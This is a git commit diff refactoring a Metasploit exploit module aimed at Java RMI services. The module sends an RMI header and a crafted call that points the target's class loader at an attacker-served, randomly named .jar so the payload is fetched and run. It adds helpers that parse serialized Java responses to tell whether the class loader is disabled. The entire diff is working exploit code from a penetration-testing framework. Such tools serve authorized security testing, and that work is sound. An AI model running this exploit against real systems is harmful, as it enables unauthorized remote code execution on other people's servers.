Refactor exploit to use the mixin

2015-01-08 16:04:56 -06:00
parent ca765e2cc5
commit fa5cd928a1
2 changed files with 53 additions and 14 deletions
@@ -113,24 +113,32 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def primer
-    print_status("#{peer} - Sending RMI Header...")
    connect
-    begin
-      send_header
-    rescue ::RuntimeError
-      print_error("#{peer} - Filed to negotiate RMI protocol")
-      disconnect
-      return
+
+    print_status("#{peer} - Sending RMI Header...")
+    send_header
+    ack = recv_protocol_ack
+    if ack.nil?
+      fail_with(Failure::NoTarget, "#{peer} - Filed to negotiate RMI protocol")
    end

-    # Determine if the instance allows remote class loading
-    print_status("#{peer} - Sending RMI Call...")
    jar = rand_text_alpha(rand(8)+1) + '.jar'
    new_url = get_uri + '/' + jar
-    begin
-      return_data = send_call(call_data: build_gc_call_data(new_url))
-    rescue ::RuntimeError
-      fail_with(Failure::Unknown, "#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected")
+
+    print_status("#{peer} - Sending RMI Call...")
+    send_call(call_data: build_gc_call_data(new_url))
+    return_data = recv_return
+
+    if return_data.nil? && !session_created?
+      fail_with(Failure::Unknown, 'RMI Call failed')
+    end
+
+    if return_data && loader_disabled?(return_data)
+      fail_with(Failure::NotVulnerable, 'The RMI class loader is disabled')
+    end
+
+    if return_data && class_not_found?(return_data)
+      fail_with(Failure::Unknown, 'The RMI class loader couldn\'t find the payload')
    end

    disconnect
@@ -162,4 +170,30 @@ class Metasploit3 < Msf::Exploit::Remote
    return true
  end

+  def loader_disabled?(stream)
+    stream.contents.each do |content|
+      if content.class == Rex::Java::Serialization::Model::NewObject &&
+          content.class_desc.description.class == Rex::Java::Serialization::Model::NewClassDesc &&
+          content.class_desc.description.class_name.contents == 'java.lang.ClassNotFoundException'&&
+          content.class_data[0].class == Rex::Java::Serialization::Model::NullReference &&
+          content.class_data[1].contents.include?('RMI class loader disabled')
+        return true
+      end
+    end
+
+    false
+  end
+
+  def class_not_found?(stream)
+    stream.contents.each do |content|
+      if content.class == Rex::Java::Serialization::Model::NewObject &&
+          content.class_desc.description.class == Rex::Java::Serialization::Model::NewClassDesc &&
+          content.class_desc.description.class_name.contents == 'java.lang.ClassNotFoundException'
+        return true
+      end
+    end
+
+    false
+  end
+
 end